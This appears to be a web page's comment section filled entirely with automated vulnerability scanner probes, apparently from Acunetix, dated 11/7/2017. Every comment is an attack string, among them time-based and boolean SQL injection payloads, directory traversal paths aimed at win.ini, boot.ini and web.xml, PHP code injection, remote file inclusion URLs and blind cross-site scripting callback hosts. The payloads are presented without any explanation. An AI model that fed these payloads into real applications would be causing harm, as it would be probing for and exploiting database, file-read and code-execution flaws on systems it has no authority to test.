Comment(413)
|
yi7MMGWa'));select pg_sleep(12); --
11/7/2017
GqMEmKEu');select pg_sleep(6); --
11/7/2017
dGo77Z2n';select pg_sleep(6); --
11/7/2017
F1a0Nyku')); waitfor delay '0:0:6' --
11/7/2017
c6ZXjaHJ'); waitfor delay '0:0:6' --
11/7/2017
Au8P1zrN'; waitfor delay '0:0:6' --
11/7/2017
1 waitfor delay '0:0:18' --
11/7/2017
(select(0)from(select(sleep(18)))v)/*'+(select(0)from(select(sleep(18)))v)+'"+(select(0)from(select(
11/7/2017
if(now()=sysdate(),sleep(18),0)/*'XOR(if(now()=sysdate(),sleep(18),0))OR'"XOR(if(now()=sysdate(),sle
11/7/2017
-1" OR 2+625-625-1=0+0+0+1 --
11/7/2017
-1' OR 2+710-710-1=0+0+0+1 or 'IkpfD7oR'='
11/7/2017
-1' OR 2+116-116-1=0+0+0+1 --
11/7/2017
-1 OR 2+392-392-1=0+0+0+1
11/7/2017
-1 OR 2+710-710-1=0+0+0+1 --
11/7/2017
DCWQf8mu'));select pg_sleep(18); --
BfVy87WZ');select pg_sleep(12); --
LtEPDlDv';select pg_sleep(6); --
-1));select pg_sleep(6); --
-1);select pg_sleep(6); --
-1;select pg_sleep(6); --
Vgk4Pd28')); waitfor delay '0:0:6' --
1gHzIHLL'); waitfor delay '0:0:6' --
iQ6nXKMz'; waitfor delay '0:0:6' --
1 waitfor delay '0:0:6' --
-1)); waitfor delay '0:0:6' --
-1); waitfor delay '0:0:18' --
-1; waitfor delay '0:0:18' --
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/
-1" OR 2+486-486-1=0+0+0+1 --
-1' OR 2+978-978-1=0+0+0+1 or 'vd1oIC12'='
-1' OR 2+204-204-1=0+0+0+1 --
-1 OR 2+644-644-1=0+0+0+1
-1 OR 2+450-450-1=0+0+0+1 --
WEB-INF\web.xml
11/7/2017
WEB-INF/web.xml
11/7/2017
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
11/7/2017
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
11/7/2017
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
11/7/2017
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
11/7/2017
..\..\..\..\..\..\..\..\windows\win.ini
11/7/2017
................windowswin.ini
11/7/2017
������������������������������������������������windows��win.ini
11/7/2017
../../../../../../../../../../windows/win.ini .jpg
11/7/2017
../../../../../../../../../../boot.ini
11/7/2017
../../../../../../../../../../windows/win.ini
11/7/2017
(select convert(int,CHAR(65)))
11/7/2017
(select convert(int,CHAR(65)))
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
..\..\..\..\..\..\..\..\windows\win.ini
................windowswin.ini
������������������������������������������������windows��win.ini
../../../../../../../../../../windows/win.ini .jpg
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini
/www.vulnweb.com
11/7/2017
${@print(md5(acunetix_wvs_security_test))}\
11/7/2017
${@print(md5(acunetix_wvs_security_test))}
11/7/2017
";print(md5(acunetix_wvs_security_test));$a="
11/7/2017
';print(md5(acunetix_wvs_security_test));$a='
11/7/2017
;print(md5(acunetix_wvs_security_test));
11/7/2017
${@print(md5(acunetix_wvs_security_test))}\
${@print(md5(acunetix_wvs_security_test))}
";print(md5(acunetix_wvs_security_test));$a="
';print(md5(acunetix_wvs_security_test));$a='
;print(md5(acunetix_wvs_security_test));
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
11/7/2017
http://hit936fjJsk0k.bxss.me/
11/7/2017
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
http://hitBCZcUa4f5P.bxss.me/
testasp.vulnweb.com
11/7/2017
http://testasp.vulnweb.com/t/fit.txt?.jpg
11/7/2017
^(#$!@#$)(()))******
11/7/2017
Http://testasp.vulnweb.com/t/fit.txt
11/7/2017
1some_inexistent_file_with_long_name .jpg
11/7/2017
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
11/7/2017
| |